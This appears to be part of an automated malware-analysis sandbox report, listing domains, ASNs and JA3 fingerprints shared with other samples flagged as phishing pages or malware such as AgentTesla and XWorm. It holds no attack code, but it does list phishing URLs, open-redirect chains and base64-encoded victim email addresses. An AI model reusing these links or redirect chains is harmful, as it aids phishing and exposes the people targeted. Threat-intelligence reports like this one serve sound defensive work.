                  185.199.109.133https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                    https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5sGet hashmaliciousHTMLPhisherBrowse
                      https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuITGet hashmaliciousHTMLPhisherBrowse
                        http://mysterymint-s10.vercel.app/Get hashmaliciousUnknownBrowse
                          https://ns43q4.csb.app/Get hashmaliciousUnknownBrowse
                            https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//dolar2go.com/new/auth//klqsxqvkkosgj/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ==Get hashmaliciousHTMLPhisherBrowse
                              https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//littlelassies.com/ejk/xlpd//j40gstqcualqm/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ==Get hashmaliciousHTMLPhisherBrowse
                                http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                  https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4Get hashmaliciousHTMLPhisherBrowse
                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      raw.githubusercontent.comhttps://ns43q4.csb.app/Get hashmaliciousUnknownBrowse
                                      • 185.199.109.133
                                      Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                      • 185.199.109.133
                                      Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                      • 185.199.109.133
                                      https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1Get hashmaliciousUnknownBrowse
                                      • 185.199.109.133
                                      SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                      • 185.199.110.133
                                      fart.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                      • 185.199.109.133
                                      fart.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                      • 185.199.109.133
                                      LeqO0KJkDX.exeGet hashmaliciousUnknownBrowse
                                      • 185.199.108.133
                                      LeqO0KJkDX.exeGet hashmaliciousUnknownBrowse
                                      • 185.199.111.133
                                      ZED Online.zipGet hashmaliciousUnknownBrowse
                                      • 185.199.109.133
                                      ip-api.comQUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      github.comhttps://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5sGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20=Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuITGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//dolar2go.com/new/auth//klqsxqvkkosgj/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ==Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//littlelassies.com/ejk/xlpd//j40gstqcualqm/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ==Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      www.cloudflare.comfart.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                      • 104.16.123.96
                                      https://bafybeicl3sruyvjs6is67yed47chltq63n7qdv67sjo4yupnqu6bmy5uka.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                      • 104.16.123.96
                                      http://104.21.19.145Get hashmaliciousUnknownBrowse
                                      • 104.16.124.96
                                      http://telegravm.work/Get hashmaliciousTelegram PhisherBrowse
                                      • 104.16.124.96
                                      http://telegrram.work/Get hashmaliciousTelegram PhisherBrowse
                                      • 104.16.123.96
                                      http://telegrmaw.work/Get hashmaliciousTelegram PhisherBrowse
                                      • 104.16.124.96
                                      https://m.morrissey-mmuptn7vfawopptn7vfawop.narymar.com/Get hashmaliciousUnknownBrowse
                                      • 104.16.123.96
                                      win5.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                      • 104.16.123.96
                                      https://29s1800n.loginprotect.net/?d=Pph_w2oGWx7iLtjGF3N_NGet hashmaliciousUnknownBrowse
                                      • 104.16.124.96
                                      https://ps6q3676.loginprotect.net/?d=QALAHQu0HO56gLnZ_CF6NGet hashmaliciousUnknownBrowse
                                      • 104.16.124.96

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      FASTLYUSService Desk - Please verify your Account!.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.192.217
                                      https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                                      • 185.199.108.133
                                      https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                      • 151.101.2.137
                                      http://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqgGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.2.132
                                      http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
                                      • 151.101.0.114
                                      Vertex Business Services_SKM_C950633210_650106.pdfGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.194.137
                                      https://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.65.46
                                      Quarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.130.137
                                      https://uglb4.roperelo.com/caGPey/Get hashmaliciousUnknownBrowse
                                      • 151.101.130.137
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.2.137
                                      FASTLYUSService Desk - Please verify your Account!.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.192.217
                                      https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                                      • 185.199.108.133
                                      https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                      • 151.101.2.137
                                      http://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqgGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.2.132
                                      http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
                                      • 151.101.0.114
                                      Vertex Business Services_SKM_C950633210_650106.pdfGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.194.137
                                      https://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.65.46
                                      Quarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.130.137
                                      https://uglb4.roperelo.com/caGPey/Get hashmaliciousUnknownBrowse
                                      • 151.101.130.137
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.2.137
                                      TUT-ASUSQUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 208.95.112.1
                                      GITHUBUShttps://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5sGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20=Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuITGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//dolar2go.com/new/auth//klqsxqvkkosgj/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ==Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.4
                                      https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//littlelassies.com/ejk/xlpd//j40gstqcualqm/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ==Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4Get hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eProducts inquiryJULY ORDER2024.PDF.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      http://ferjex.comGet hashmaliciousUnknownBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      Service Desk - Please verify your Account!.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      6Ek4nfs2y1.exeGet hashmaliciousPhoenixKeylogger, PureLog StealerBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
